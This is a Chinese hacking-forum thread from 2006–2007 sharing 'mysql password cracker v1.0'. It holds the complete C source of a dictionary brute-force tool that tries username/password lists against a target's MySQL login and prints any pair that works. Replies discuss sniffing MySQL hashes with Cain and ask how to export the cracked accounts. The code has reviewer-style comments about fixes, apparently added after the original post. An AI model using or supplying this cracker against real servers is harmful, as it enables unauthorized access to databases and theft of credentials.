
zhouzhen 2006-11-24 19:47

[原创]mysql password cracker v 1.0

[信息来源]邪恶八进制信息安全团队
[文章作者] zhouzhen[E.S.T]

mysql password crack v 1.0
      [email]zhouzhen@gmail.com[/email] [url]http://zhouzhen.eviloctal.org[/url]

usage : mysql_pwd_crack [ip] [options]
options:
      -u username  specify the username of mysql
      -x port    specify the port of mysql
      -p password  specify the password of mysql
      -d dict    specify the dictionary
      -a automode  automatic crack the mysql password
      Note: when u use the -a option, named the username dict user.dic
        password dict pass.dic

example: mysql_pwd_crack 127.0.0.1 -x 3306 -u root -d passdict.txt
      mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt
      mysql_pwd_crack 127.0.0.1 -x 3306 -a

[attach]9798[/attach]

zhuwg 2006-12-3 12:35

爆破是没办法的办法,一般来说效果不怎么样
最好还是sniff的密码

唐不狐 2006-12-9 12:19

获取到一些资料的时候 做个小字典跑下也是可行的。

不支持 用户名 和 密码同时使用字典?
我看参数里似乎没有。

-a 原来这个参数就是了。 看漏了。顶LZ一下

sunyy 2006-12-30 04:36

顶上! 刚好有用! 有错再报上!
3楼的说mysql可以嗅能提供一下吗! 听说嗅出来的都是HASH

microshupi 2006-12-30 08:54

嗅探应该可以嗅探出来的
具体是不是HASH就不知道了,没有试过
不错破解需要一些运气在里面
不过楼主是在强
支持一下

唐不狐 2007-1-1 16:04

cain能嗅mysql,嗅到的的确是hash ,再用工具跑吧

zhouzhen 2007-1-6 11:46

开源代码 [url]http://www.xfocus.net/tools/200612/1204.html[/url]

[code]


#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include "mysql.h"

#pragma comment(lib, "Ws2_32.lib")

/* One password-dictionary entry in a singly linked list built by
 * Create_Pass_link().  The list hangs off a dummy head node whose
 * `password` field is unused. */
typedef struct PassNode{
   TCHAR password[100];     /* one dictionary line, NUL-terminated; read with fgets(..., 100, ...) */
   struct PassNode * Next;  /* following entry, NULL at the end of the list */
} PassInfo;

/* One user-name-dictionary entry in a singly linked list built by
 * Create_Name_link().  Same layout and dummy-head convention as PassInfo. */
typedef struct NameNode{
   TCHAR Name[100];         /* one dictionary line, NUL-terminated; read with fgets(..., 100, ...) */
   struct NameNode * Next;  /* following entry, NULL at the end of the list */
}NameInfo;

void usage(){

   /*
    * Print the banner, the option summary and the examples, then terminate
    * the process with exit status 1.  The "usage :" line is written to
    * stderr and everything else to stdout, as before.  Never returns.
    */
   static const char banner[] =
      "mysql password crack v 1.0\n"
      "\t [email]zhouzhen@gmail.com[/email] [url]http://zhouzhen.eviloctal.org[/url]\n\n";
   static const char options[] =
      "options:\n"
      "\t-u username  specify the username of mysql\n"
      "\t-x port    specify the port of mysql\n"
      "\t-p password  specify the password of mysql\n"
      "\t-d dict    specify the dictionary\n"
      "\t-a automode  automatic crack the mysql password \n"
      "\tNote: when u use the -a option, named the username dict user.dic\n"
      "\t  password dict pass.dic\n";
   static const char examples[] =
      "\nexample: mysql_pwd_crack 127.0.0.1 -x 3306 -u root -d passdict.txt\n"
      "\t mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt\n"
      "\t mysql_pwd_crack 127.0.0.1 -x 3306 -a\n";

   fputs(banner, stdout);
   fputs("usage : mysql_pwd_crack [ip] [options]\n", stderr);
   fputs(options, stdout);
   fputs(examples, stdout);
   exit(1);

}

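PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){

    /*
     * Read up to NodeNum lines from DictFile and build a singly linked list
     * of PassInfo nodes behind a dummy head node.
     *
     * NodeNum  : number of lines to read (normally the LineCount() result).
     * DictFile : open, readable stream positioned at the start of the data.
     *
     * Returns the dummy head node; the first real entry is h->Next.  The
     * caller owns every node.  On allocation failure the process exits with
     * a non-zero status (the original used exit(0), which reported success).
     *
     * Fixes over the original: the line is read straight into the node, the
     * fgets() result is checked so a short file stops at EOF instead of
     * copying stale data, and the newline is stripped only when present.
     * The original did strncpy(..., strlen(tmp)-1), which underflows to
     * SIZE_MAX on an empty read (heap overflow) and chopped the last
     * character of a final line that has no newline.
     */
    PassInfo *h, *p, *s;  /* h: dummy head, p: last node appended, s: node being built */
    int i;

    if ( (h = malloc(sizeof *h)) == NULL )
    {
       fprintf(stderr, "malloc failed %d", GetLastError());
       exit(1);
    }

    h->Next = NULL;
    p = h;

    for ( i = 0; i < NodeNum; i++ )
    {
        size_t len;

        if ( (s = malloc(sizeof *s)) == NULL )
        {
           fprintf(stderr, "malloc failed %d", GetLastError());
           exit(1);
        }

        /* fgets NUL-terminates and never writes past sizeof s->password */
        if ( fgets(s->password, (int)sizeof s->password, DictFile) == NULL )
        {
            free(s);   /* fewer lines than announced: stop at EOF */
            break;
        }

        /* drop the trailing newline (and a CR left by a CRLF file) */
        len = strlen(s->password);
        if ( len > 0 && s->password[len - 1] == '\n' )
            s->password[--len] = '\0';
        if ( len > 0 && s->password[len - 1] == '\r' )
            s->password[--len] = '\0';

        s->Next = NULL;
        p->Next = s;
        p = s;
    }

    return h;

}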

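NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){

    /*
     * Read up to NodeNum lines from the user-name dictionary DictFile and
     * build a singly linked list of NameInfo nodes behind a dummy head node.
     *
     * NodeNum  : number of lines to read (normally the LineCount() result).
     * DictFile : open, readable stream positioned at the start of the data.
     *
     * Returns the dummy head node; the first real entry is h->Next.  The
     * caller owns every node.  On allocation failure the process exits with
     * a non-zero status (the original used exit(0), which reported success).
     *
     * Fixes over the original: the line is read straight into the node, the
     * fgets() result is checked so a short file stops at EOF instead of
     * copying stale data, and the newline is stripped only when present.
     * The original did strncpy(..., strlen(tmp)-1), which underflows to
     * SIZE_MAX on an empty read (heap overflow) and chopped the last
     * character of a final line that has no newline.
     */
    NameInfo *h, *p, *s;  /* h: dummy head, p: last node appended, s: node being built */
    int i;

    if ( (h = malloc(sizeof *h)) == NULL )
    {
       fprintf(stderr, "malloc failed %d", GetLastError());
       exit(1);
    }

    h->Next = NULL;
    p = h;

    for ( i = 0; i < NodeNum; i++ )
    {
        size_t len;

        if ( (s = malloc(sizeof *s)) == NULL )
        {
           fprintf(stderr, "malloc failed %d", GetLastError());
           exit(1);
        }

        /* fgets NUL-terminates and never writes past sizeof s->Name */
        if ( fgets(s->Name, (int)sizeof s->Name, DictFile) == NULL )
        {
            free(s);   /* fewer lines than announced: stop at EOF */
            break;
        }

        /* drop the trailing newline (and a CR left by a CRLF file) */
        len = strlen(s->Name);
        if ( len > 0 && s->Name[len - 1] == '\n' )
            s->Name[--len] = '\0';
        if ( len > 0 && s->Name[len - 1] == '\r' )
            s->Name[--len] = '\0';

        s->Next = NULL;
        p->Next = s;
        p = s;
    }

    return h;

}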


int LineCount(FILE * fd)
{
   /*
    * Count how many fgets() reads of a 100-byte buffer the stream yields,
    * then rewind it so the caller can read the same data again.
    *
    * fd : open, readable stream.
    *
    * Returns the number of chunks read.  A line longer than 99 characters
    * is counted once per chunk, which matches the way the Create_*_link
    * readers consume the same file with a 100-byte buffer.
    */
   char chunk[100] = {0};
   int lines;

   for (lines = 0; fgets(chunk, sizeof chunk, fd) != NULL; lines++)
      ;

   rewind(fd);
   return lines;
}

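BOOL IsPortOpen(char * address, int port)
{
   /*
    * Probe whether a TCP connection to address:port can be established.
    *
    * address : host name or dotted IPv4 string, resolved with gethostbyname().
    * port    : TCP port in host byte order.
    *
    * Returns TRUE when a non-blocking connect() either completes at once or
    * becomes writable within a 5 second select() timeout, FALSE otherwise.
    * Winsock 1.1 is started and torn down inside this call, and every exit
    * path now releases the socket it created (the original leaked the socket
    * and the Winsock session when name resolution failed).
    */
   WSADATA wsadata;
   int fd;
   int rc;                      /* was named `recv`, which shadowed the socket API */
   struct sockaddr_in clientaddress;
   struct hostent * host1;
   BOOL Result = FALSE;
   struct timeval timer4;
   fd_set writefd;
   ULONG value = 1;             /* FIONBIO argument: 1 = non-blocking */

   rc = WSAStartup(MAKEWORD(1,1), &wsadata);
   if (rc != 0)
   {
      printf("init failed %d. ", WSAGetLastError());
      return FALSE;
   }

   if ( LOBYTE( wsadata.wVersion ) != 1 || HIBYTE( wsadata.wVersion ) != 1 )
   {
      /* no usable winsock.dll for version 1.1 */
      WSACleanup();
      return FALSE;
   }

   fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (fd < 0)
   {
      printf("[-] Create socket error %d. \n", WSAGetLastError());
      WSACleanup();
      return FALSE;
   }

   ioctlsocket(fd, FIONBIO, &value);

   if ( !(host1 = gethostbyname(address)) )
   {
      printf("[-] Gethostbyname(%s) error %d.\n", address, WSAGetLastError());
      closesocket(fd);          /* original returned here without closing */
      WSACleanup();
      return FALSE;
   }

   memset(&clientaddress, 0, sizeof clientaddress);
   clientaddress.sin_family = AF_INET;
   clientaddress.sin_port = htons((unsigned short)port);
   clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);

   timer4.tv_sec = 5;
   timer4.tv_usec = 0;

   /* On a non-blocking socket connect() normally returns an error with the
    * in-progress code and completion is signalled by select() writability. */
   rc = connect(fd, (struct sockaddr *)&clientaddress, sizeof clientaddress);
   if (rc == 0)
   {
      Result = TRUE;            /* completed immediately */
   }
   else
   {
      FD_ZERO(&writefd);
      FD_SET(fd, &writefd);
      rc = select(fd + 1, NULL, &writefd, NULL, &timer4);
      if (rc > 0 && FD_ISSET(fd, &writefd))
         Result = TRUE;
   }

   closesocket(fd);
   WSACleanup();

   return Result;

}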


int main(int argc, char **argv)
{
  /*
   * Entry point.  Accepts exactly 5 or 8 arguments in fixed positions:
   *   <ip> -x <port> -u <user> -d <dict>   fixed user, password dictionary
   *   <ip> -x <port> -p <pass> -d <dict>   user dictionary, fixed password
   *   <ip> -x <port> -a                    user.dic x pass.dic from the cwd
   * It first checks that <ip>:<port> accepts a TCP connection, then calls
   * mysql_real_connect() once per candidate against the "mysql" schema.
   * Every attempt is a complete authentication exchange with the server;
   * the Sleep(100) only paces the client, so server-side failed-login
   * logging and connection throttling observe each attempt directly.
   *
   * Returns 0.  Every error path calls exit() instead of returning.
   */

  MYSQL *sock,mysql;  /* NOTE(review): sock is assigned only inside the attempt loops; it is indeterminate at mysql_close() when no attempt ran (empty dictionary) */
  PassInfo * head, * curr = NULL;
  NameInfo * headnode, * currnode = NULL;
  int namecount = 0, passcount = 0;

/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
// Only argc == 5 (-a) or argc == 8 (-u/-p with -d) is accepted, and every option
// must sit at its fixed index.  strcmpi() is the MSVC case-insensitive compare
// and returns 0 on a match, so "if (strcmpi(...))" means "if it does not match".
/////////////////////////////////////////////////////////////////////////////////////////////
  if( argc != 5)
    if(argc != 8)
       usage();

  if (argc == 8)
  {
    if ( strcmpi(argv[2], "-x") )
       usage();

    if ( strcmpi(argv[4], "-u") )
       if ( strcmpi(argv[4], "-p") )
          usage();

    if ( !strcmpi(argv[4], "-u") )
       if ( strcmpi(argv[6], "-d") )
          usage();

    if ( !strcmpi(argv[4], "-p") )
       if ( strcmpi(argv[6], "-d") )
          usage();  
  }

  if (argc == 5)
  {
    if ( strcmpi(argv[2], "-x") )
       usage();
    if ( strcmpi(argv[4], "-a") )
       usage();
  }

/* determine whether the mysql port is open.
 * NOTE(review): atoi() yields 0 for a non-numeric port and there is no range
 * check; the same unchecked conversion is repeated at every connect below. */
  if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
  {
    printf("Can&#39;t connect to %s:%d", argv[1], atoi(argv[3]));
    exit(0);
  }
  

////////////////////////////////////////////////////////////////////////////////////////////
// specify the username (-u): fixed user from argv[5], passwords from the file argv[7]
//////////////////////////////////////////////////////////////////////////////////////////////

  mysql_init(&mysql);  /* init the mysql handle once; the same handle is reused for every
                          attempt below -- NOTE(review): confirm against the client library
                          that a handle may be reused after a failed or successful connect */

  if ( !strcmpi(argv[4], "-u"))
  {
    /* open the password dictionary (text mode) */

    FILE * passdic = NULL;
    if ( (passdic = fopen(argv[7], "r")) ==NULL){
       fprintf(stderr, "Can&#39;t open the password dictionary\n");
       exit(0);
    }
   
    passcount = LineCount(passdic);

    head = Create_Pass_link(passcount, passdic);  /* create the password link */

    curr = head ->Next;
    while(curr != NULL)
    {
       printf("Now cracking %s %s    \n",  argv[5], curr->password);
       fflush(NULL);

       /* assignment inside the condition is intentional: sock keeps the last result */
       if ( sock = mysql_real_connect(&mysql, argv[1], argv[5], curr->password, "mysql", atoi(argv[3]), NULL, 0) )
        printf("\nSuccessfully --> username %s password %s \n", argv[5], curr->password);
       curr = curr->Next;
       Sleep(100);  /* 100 ms pause between attempts */

    } /* one attempt per dictionary entry */

    fclose(passdic);
    free(head);  /* NOTE(review): frees only the dummy head; the nodes behind it leak */


  }


  ///////////////////////////////////////////////////////////////////////////////////////////////////
  // specify the password (-p): fixed password from argv[5], user names from the file argv[7]
  //////////////////////////////////////////////////////////////////////////////////////////////////

  if ( !strcmpi(argv[4], "-p"))
  {

    /* open the user-name dictionary (text mode) */

    FILE * Namedict = NULL;
    if ( (Namedict = fopen(argv[7], "r")) ==NULL){
       fprintf(stderr, "Can&#39;t open the name dictionary\n");
       exit(0);
    }
   
    /* count lines of the name dictionary */

    namecount = LineCount(Namedict);

    headnode = Create_Name_link(namecount, Namedict);  /* create user link */

    currnode = headnode->Next;
    while (currnode != NULL)
    {
       printf("Now cracking %s %s  \n", currnode->Name, argv[5]);
       fflush(NULL);
      
       /* assignment inside the condition is intentional: sock keeps the last result */
       if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, argv[5], "mysql", atoi(argv[3]), NULL, 0) )
        printf("\nSuccessfully --> username %s password %s \n", currnode->Name, argv[5]);
       currnode = currnode->Next;
       Sleep(100);  /* 100 ms pause between attempts */

    }

    fclose(Namedict);
    free(currnode);  /* NOTE(review): currnode is NULL here, so this frees nothing and the whole list (including headnode) leaks */

  }

  ////////////////////////////////////////////////////////////////////////////////////////////////
  // automatic mode (-a): every name in user.dic against every entry in pass.dic,
  // both files taken from the current working directory
  ////////////////////////////////////////////////////////////////////////////////////////////////

  if ( !strcmpi(argv[4], "-a"))
  {
    FILE * usernamedict = NULL, *passwordict = NULL;
    int nameline = 0, passline = 0;
    NameInfo * namehead, * currname = NULL;
    PassInfo * passhead, * currpass = NULL;

    /* open the user.dic */
    if ( (usernamedict = fopen("user.dic", "r")) ==NULL){
       fprintf(stderr, "Can&#39;t open the user.dic file.\n");
       exit(0);
    }

    /* open the pass.dic
     * NOTE(review): the error message below names user.dic although pass.dic failed */
    if ( (passwordict = fopen("pass.dic", "r")) ==NULL){
       fprintf(stderr, "Can&#39;t open the user.dic file.\n");
       exit(0);
    }

    /* count the lines of the files */
    nameline = LineCount(usernamedict);
    passline = LineCount(passwordict);

    namehead = Create_Name_link(nameline, usernamedict);
    passhead = Create_Pass_link(passline, passwordict);

    /* outer loop over names, inner loop over passwords; the inner cursor is
     * reset to the first password after each name */
   
    currname = namehead->Next;
    currpass = passhead->Next;

    while (currname != NULL)
    {
       while(currpass != NULL)
       {
          printf("Now cracking %s %s    \n", currname->Name, currpass->password);
          fflush(NULL);

          /* assignment inside the condition is intentional: sock keeps the last result */
          if ( sock = mysql_real_connect(&mysql, argv[1], currname->Name, currpass->password, "mysql", atoi(argv[3]), NULL, 0) )
            printf("\nSuccessfully --> username %s password %s \n", currname->Name, currpass->password);
         
          currpass = currpass->Next;
          Sleep(100);  /* 100 ms pause between attempts */
       }

       currpass = passhead->Next;
       currname = currname->Next;
    }

    fclose(usernamedict);
    fclose(passwordict);
    free(namehead);  /* NOTE(review): frees only the dummy heads; the list nodes leak */
    free(passhead);

  }



  mysql_close(sock);  /* closes whatever the last attempt produced; see the NOTE on sock above */
  return 0;

}
[/code]

atta 2007-11-17 23:42

这个程序能不能自动把破解出来的帐号和密码导出到文件里面啊 不然就算破解出来了也看不到的啊
